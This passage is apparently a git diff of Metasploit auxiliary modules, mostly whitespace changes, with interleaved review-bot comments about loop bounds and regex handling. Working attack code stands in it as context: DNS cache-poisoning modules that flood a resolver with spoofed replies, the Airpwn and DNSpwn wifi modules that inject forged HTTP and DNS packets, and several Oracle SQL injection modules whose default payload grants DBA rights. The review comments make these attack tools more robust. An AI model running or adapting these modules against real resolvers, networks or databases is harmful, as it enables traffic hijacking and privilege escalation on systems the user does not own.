= 53 n.l4.dst_port = sport.to_i n.l4.payload = req.encode - + xidbase.upto(xidbase+numxids-1) do |id| req.id = id - barbs.each do |barb| + barbs.each do |barb| n.l3.src_ip = barb[:addr].to_s - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) buff = n.pack - + capture_sendto(buff, target) responses += 1 end @@ -358,16 +369,16 @@ class Metasploit3 < Msf::Auxiliary return end print_status("Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") - end + end end # every so often, check and see if the target is poisoned... - if queries % 250 == 0 + if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(domain, Resolv::DNS::Resource::IN::NS) query.rd = 0 - + srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() 
@@ -397,8 +408,8 @@ class Metasploit3 < Msf::Auxiliary # Send a recursive query to the target server, then flood # the server with non-recursive queries for the same entry. # Calculate how many non-recursive queries we receive back - # until the real server responds. This should give us a - # ballpark figure for ns->ns latency. We can repeat this + # until the real server responds. This should give us a + # ballpark figure for ns->ns latency. We can repeat this # a few times to account for each nameserver the cache server # may query for the target domain. # @@ -409,9 +420,9 @@ class Metasploit3 < Msf::Auxiliary cnt = 0 times = [] - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - + sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 @@ -426,7 +437,7 @@ class Metasploit3 < Msf::Auxiliary q_beg_t = Time.now.to_f sock.put(req.encode) req.rd = 0 - + while(times.length < num) res, addr = sock.recvfrom(65535, 0.01) @@ -436,31 +447,31 @@ class Metasploit3 < Msf::Auxiliary if(res.id == 1) times << [Time.now.to_f - q_beg_t, cnt] cnt = 0 - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - sock.close + sock.close sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 - ) - + ) + q_beg_t = Time.now.to_f req = Resolv::DNS::Message.new req.add_question(hostname, Resolv::DNS::Resource::IN::A) req.rd = 1 req.id = 1 - + sock.put(req.encode) - req.rd = 0 + req.rd = 0 end - + cnt += 1 end - + req.id += 1 - - sock.put(req.encode) + + sock.put(req.encode) end min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0 
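Review bot: The `while(times.length < num)` loop in `calculate_race` has no iteration bound: if the recursive answer with `res.id == 1` never comes back (the cache drops the query, or the domain's nameservers are unreachable) it keeps sending a non-recursive query every 10 ms indefinitely and `racer`/`run` never return. An attempt counter next to `req.id += 1` — `attempts += 1` and `break if attempts > 10_000`, with a warning when it trips — keeps the probe from becoming an open-ended flood; `req.id` also grows without bound and, if the id is packed as a 16-bit field by `Resolv::DNS::Message#encode`, would wrap back to 1 after 65535 queries and be mistaken for the recursive reply, which is worth confirming. Once the loop can exit early, the min/max/avg lines after it need an `if times.empty?` guard or `.min` returns nil and the arithmetic raises. `calculate_race` starts before this hunk and continues after it.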
@@ -468,20 +479,20 @@ class Metasploit3 < Msf::Auxiliary sum = 0 times.each{|i| sum += i[0]} avg_time = ( (sum / times.length) * 100).to_i / 100.0 - + min_count = times.map{|i| i[1]}.min max_count = times.map{|i| i[1]}.max sum = 0 times.each{|i| sum += i[1]} avg_count = sum / times.length - + sock.close - + print_status(" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}") # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count - end - + end + end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 0b126d0afd..21f095587c 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + require 'msf/core' require 'net/dns' require 'racket' 
@@ -9,15 +13,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DNS BailiWicked Host Attack', 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which + This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those - queries from the authoritative nameservers for that domain. Eventually, a - guessed ID will match, the spoofed packet will get accepted, and due to the + queries from the authoritative nameservers for that domain. Eventually, a + guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached. }, @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 21 2008' )) - + register_options( [ OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 
@@ -42,29 +46,29 @@ class Metasploit3 < Msf::Auxiliary OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), - + ], self.class) deregister_options('FILTER','PCAPFILE') - + end - + def auxiliary_commands - return { + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server", } end - + def cmd_racer(*args) targ = args[0] || rhost() dom = args[1] || "example.com" - + if !(targ and targ.length > 0) print_status("usage: racer [dns-server] [domain]") return end - + calculate_race(targ, dom) end @@ -79,20 +83,20 @@ class Metasploit3 < Msf::Auxiliary srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 - ) + ) random = false ports = {} lport = nil reps = 0 - + 1.upto(30) do |i| - + req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom(65535, 1.0) @@ -115,24 +119,24 @@ class Metasploit3 < Msf::Auxiliary end end end - - + + if(i>5 and ports.keys.length == 0) break - end + end end - + srv_sock.close - + if(ports.keys.length == 0) print_status("ERROR: This server is not replying to recursive requests") return end - + if(reps < 30) print_status("WARNING: This server did not reply to all of our requests") end - + if(random) ports_u = ports.keys.length ports_r = ((ports.keys.length/30.0)*100).to_i 
@@ -144,11 +148,11 @@ class Metasploit3 < Msf::Auxiliary print_status("FAIL: This server uses a static source port and is vulnerable to poisoning") end end - + def run target = rhost() source = Rex::Socket.source_address(target) - saddr = datastore['SRCADDR'] + saddr = datastore['SRCADDR'] sport = datastore['SRCPORT'] hostname = datastore['HOSTNAME'] + '.' address = datastore['NEWADDR'] @@ -159,7 +163,7 @@ class Metasploit3 < Msf::Auxiliary numxids = xids domain = hostname.sub(/\w+\x2e/,"") - + srv_sock = Rex::Socket.create_udp( 'PeerHost' => target, 'PeerPort' => 53 @@ -171,10 +175,10 @@ class Metasploit3 < Msf::Auxiliary txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() - + if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| @@ -205,7 +209,7 @@ class Metasploit3 < Msf::Auxiliary if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| - + if((name.to_s + ".") == hostname) t = Time.now + ttl print_status("Failure: This hostname is already in the target cache: #{name}") @@ -214,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary sleep ttl end end - + end end until not cached rescue ::Interrupt 
@@ -241,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain, Net::DNS::SOA) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 @@ -250,7 +254,7 @@ class Metasploit3 < Msf::Auxiliary print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end - end + end end if barbs.length == 0 @@ -270,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary srv_sock.close close_pcap return - end + end print_status("Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") end @@ -294,11 +298,11 @@ class Metasploit3 < Msf::Auxiliary req.rd = 1 src_ip = source - + if(saddr == 'Random') src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") end - + n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = src_ip @@ -310,13 +314,13 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = (rand((2**16)-1024)+1024).to_i n.l4.dst_port = 53 n.l4.payload = req.encode - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - buff = n.pack + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack capture_sendto(buff, target) - + queries += 1 - + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) 
@@ -328,14 +332,14 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = 53 n.l4.dst_port = sport.to_i n.l4.payload = req.encode - + xidbase.upto(xidbase+numxids-1) do |id| req.id = id barbs.each do |barb| n.l3.src_ip = barb[:addr].to_s - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) buff = n.pack - + capture_sendto(buff, target) responses += 1 end @@ -355,16 +359,16 @@ class Metasploit3 < Msf::Auxiliary return end print_status("Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") - end + end end # every so often, check and see if the target is poisoned... - if queries % 250 == 0 + if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(hostname, Resolv::DNS::Resource::IN::A) query.rd = 0 - + srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() @@ -392,8 +396,8 @@ class Metasploit3 < Msf::Auxiliary # Send a recursive query to the target server, then flood # the server with non-recursive queries for the same entry. # Calculate how many non-recursive queries we receive back - # until the real server responds. This should give us a - # ballpark figure for ns->ns latency. We can repeat this + # until the real server responds. This should give us a + # ballpark figure for ns->ns latency. We can repeat this # a few times to account for each nameserver the cache server # may query for the target domain. # @@ -404,9 +408,9 @@ class Metasploit3 < Msf::Auxiliary cnt = 0 times = [] - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - + sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 @@ -421,7 +425,7 @@ class Metasploit3 < Msf::Auxiliary q_beg_t = Time.now.to_f sock.put(req.encode) req.rd = 0 - + while(times.length < num) res, addr = sock.recvfrom(65535, 0.01) 
@@ -431,52 +435,52 @@ class Metasploit3 < Msf::Auxiliary if(res.id == 1) times << [Time.now.to_f - q_beg_t, cnt] cnt = 0 - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - sock.close + sock.close sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 - ) - + ) + q_beg_t = Time.now.to_f req = Resolv::DNS::Message.new req.add_question(hostname, Resolv::DNS::Resource::IN::A) req.rd = 1 req.id = 1 - + sock.put(req.encode) - req.rd = 0 + req.rd = 0 end - + cnt += 1 end - + req.id += 1 - - sock.put(req.encode) + + sock.put(req.encode) end - + min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0 max_time = (times.map{|i| i[0]}.max * 100).to_i / 100.0 sum = 0 times.each{|i| sum += i[0]} avg_time = ( (sum / times.length) * 100).to_i / 100.0 - + min_count = times.map{|i| i[1]}.min max_count = times.map{|i| i[1]}.max sum = 0 times.each{|i| sum += i[1]} avg_count = sum / times.length - + sock.close - + print_status(" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}") # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count - end - + end + end diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index 5e48e9ba50..8e4e28ff6e 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
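Review bot: Same unbounded probe loop as in bailiwicked_domain: `while(times.length < num)` only exits when a reply with `res.id == 1` arrives, so a target that never answers the recursive query keeps this method sending a non-recursive query every 10 ms with no way out except Ctrl-C. Add an attempt counter next to `req.id += 1` (`attempts += 1; break if attempts > 10_000`) and, since the loop can then exit with `times` empty, guard the statistics in this hunk with an `if times.empty?` early return before `times.map{|i| i[0]}.min * 100`, which would otherwise raise NoMethodError on nil. `calculate_race` starts before this hunk.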
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Airpwn TCP hijack', @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Airpwn' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement", - File.join(Msf::Config.install_root, "data", "exploits", "wifi", "airpwn", "sitelist.yml") + File.join(Msf::Config.install_root, "data", "exploits", "wifi", "airpwn", "sitelist.yml") ]), OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]), OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]), @@ -114,10 +114,10 @@ class Metasploit3 < Msf::Auxiliary # If we have headers if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0 # But not a content-length - if r["txresponse"].scan(/^Content-Length: /).size == 0 + if r["txresponse"].scan(/^Content-Length: /).size == 0 # Figure out the length and add it loc = (/\n\n/m =~ r["txresponse"]) - if loc == nil + if loc == nil print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is." else print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one." @@ -134,9 +134,9 @@ class Metasploit3 < Msf::Auxiliary print_status "Opening wifi module." open_wifi - self.wifi.filter = @filter if (@filter != "") + self.wifi.filter = @filter if (@filter != "") each_packet do |pkt| - + d3 = pkt.dot3 next if not d3 @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary @http.each do |r| hit = nil - r['regex'].each do |reg| + r['regex'].each do |reg| hit = tcp.payload.scan(/#{reg}/) || nil break if hit.size != 0 end 
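Review bot: `hit = tcp.payload.scan(/#{reg}/) || nil` — `String#scan` never returns nil, so the `|| nil` is dead, and `/#{reg}/` re-compiles every site pattern for every captured packet. Compile the patterns once where `@http` is populated (not in this hunk), e.g. `r['regex'] = r['regex'].map { |reg| Regexp.new(reg) }`, and write the loop as `hit = tcp.payload.scan(reg); break if hit.size != 0`; a malformed pattern in the YAML then fails at load time rather than inside the packet loop. The enclosing `run` method begins in an earlier hunk and continues past this one.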
@@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS end - self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) response.l4.seq = response.l4.seq + response.l5.payload.size response.l4.flag_ack = 1 @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary response.l4.fix!(response.l3.src_ip, response.l3.dst_ip, "") injpkt.dot3 = response.pack - self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) end end diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb index 096bc2faa5..70776f4611 100644 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ b/modules/auxiliary/spoof/wifi/dnspwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DNSpwn DNS hijack', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement", - File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml") + File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml") ]), OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]), OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]), 
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary @dns.each do |r| hit = nil - r['regex'].each do |reg| + r['regex'].each do |reg| hit = dns.question[0].qName.scan(/#{reg}/) || nil break if hit.size != 0 end @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS end - self.wifi.inject(injpkt) or print_status("DNSPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("DNSPWN failed to inject packet: " + tx.error) end end end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 3180314139..a3e02fc236 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE - procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege - on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database + The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE + procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. }, 'Author' => [ 'MC' ], 
@@ -31,9 +35,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end @@ -41,10 +45,10 @@ class Metasploit3 < Msf::Auxiliary def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " - CREATE OR REPLACE FUNCTION #{name} + CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 82b0da9803..5d52079dc8 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -15,11 +19,11 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. - Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. + EXECUTE_CATALOG_ROLE have the required privilege. + Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. }, 'Author' => [ 'MC' ], @@ -32,19 +36,19 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " - CREATE OR REPLACE FUNCTION #{name} + CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 6010a6c56c..cf877aad8d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. + EXECUTE_CATALOG_ROLE have the required privilege. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -31,21 +35,21 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 26 2010')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) var1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) var2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " -CREATE OR REPLACE FUNCTION #{name} +CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; @@ -76,7 +80,7 @@ EXECUTE IMMEDIATE #{var1}; EXECUTE IMMEDIATE #{var2}; END; | - + print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...") prepare_exec(encoded_sql) print_status("Done...") diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4bf9b4254..1fdb455775 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb 
@@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via DBMS_EXPORT_EXTENSION.', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an + This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. @@ -32,15 +36,15 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 26 2006')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 81b9fdbdb0..fb0ba954d5 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index b5f72fca99..fcb6c851cd 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " 
@@ -54,12 +58,12 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - begin + begin print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...") prepare_exec(package) rescue ::OCIError => e print_status("Removing function '#{name}'...") prepare_exec(clean) end - end + end end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index a968a45d26..3fe01fbcf3 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = 